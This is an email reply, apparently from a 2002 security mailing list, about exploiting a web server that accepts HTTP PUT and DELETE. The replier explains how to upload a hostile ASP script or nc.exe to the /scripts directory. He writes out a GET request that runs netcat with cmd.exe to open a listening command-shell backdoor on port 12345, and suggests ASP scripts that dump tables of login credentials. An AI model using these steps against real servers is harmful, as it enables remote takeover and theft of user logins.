On Tuesday 02 July 2002 12:28, LK Lee wrote: > Thanks Michel. I was able to PUT and DELETE the file sucessfully. However, > I guess due to way virtual host is configured, I couldn't actually > PUT/DELETE a page into the directory desired. I could access the file > created through URL http://1.1.1.1/puttest.html, but no through URK > http://www.mywebpage.com/puttest.html. > > Any idea if this technique can be further exploited?
Yes. Its trivial to upload a hostile ASP script or binary and then execute it by requesting it. Upload nc.exe to /scripts and then request: GET /scripts/nc.exe?-e+cmd.exe+-l+-p+12345 ... for an instance command shell backdoor. Also written ASP scripts which dump the database tables containing login information to a target web application... -HD
